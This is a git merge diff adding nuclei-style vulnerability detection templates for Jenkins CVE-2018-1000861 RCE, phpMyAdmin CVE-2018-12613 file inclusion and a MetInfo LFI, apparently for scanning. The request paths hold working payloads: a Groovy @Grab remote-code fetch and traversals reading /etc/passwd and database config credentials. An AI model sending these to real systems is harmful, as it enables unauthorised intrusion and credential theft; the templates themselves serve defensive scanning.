Merge branch 'master' into sftp-credentials-exposure

2021-02-20 19:50:00 +05:30 · 2021-02-20 19:50:00 +05:30 · 698167e7c3
parent 3f0afecb84 49e237d13e
commit 698167e7c3
5 changed files with 77 additions and 3 deletions
--- a/README.md
+++ b/README.md
@ -37,13 +37,10 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates      | Counts                         | Templates       | Counts                          | Templates        | Counts                         |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves           | 198            | vulnerabilities | 91 | exposed-panels   | 74   |
-| exposures      | 48      | technologies    | 46      | misconfiguration | 43 |
 | workflows      | 21        | miscellaneous   | 12     | default-logins   | 10 |
 | exposed-tokens | 9 | dns             | 6               | fuzzing          | 4          |
 | helpers        | 2        | takeovers       | 1         | -                | -                              |

-**61 directories, 574 files**.

 </td>
 </tr>
--- a/cves/2018/CVE-2018-1000861.yaml
+++ b/cves/2018/CVE-2018-1000861.yaml
@ -0,0 +1,25 @@
+id: CVE-2018-1000861
+
+info:
+  name: Jenkins 2.138 Remote Command Execution
+  author: dhiyaneshDK & @pikpikcu
+  severity: critical
+  reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
+  tags: cve,cve2018,jenkin,rce
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "package#vulntest"
+        part: body
+
+      - type: status
+        status:
+          - 200
--- a/cves/2018/CVE-2018-12613.yaml
+++ b/cves/2018/CVE-2018-12613.yaml
@ -0,0 +1,25 @@
+id: CVE-2018-12613
+
+info:
+  name: PhpMyAdmin 4.8.1 Remote File Inclusion
+  author: pikpikcu
+  severity: critical
+  reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
+  tags: cve,cve2018,phpmyadmin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/phpinfo.yaml
+++ b/exposures/configs/phpinfo.yaml
@ -19,6 +19,7 @@ requests:
      - "{{BaseURL}}/pinfo.php"
      - "{{BaseURL}}/phpversion.php"
      - "{{BaseURL}}/time.php"
+      - "{{BaseURL}}/index.php"
    matchers:
      - type: word
        words:
--- a/vulnerabilities/other/metinfo-lfi.yaml
+++ b/vulnerabilities/other/metinfo-lfi.yaml
@ -0,0 +1,26 @@
+id: metinfo-lfi
+info:
+  name: MetInfo 6.0.0/6.1.0 LFI
+  author: pikpikcu
+  severity: high
+  reference: https://paper.seebug.org/676/
+  tags: metinfo,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
+      - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
+      - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "con_db_pass"
+          - "con_db_name"
+        part: body
+        condition: and
+      - type: status
+        status:
+          - 200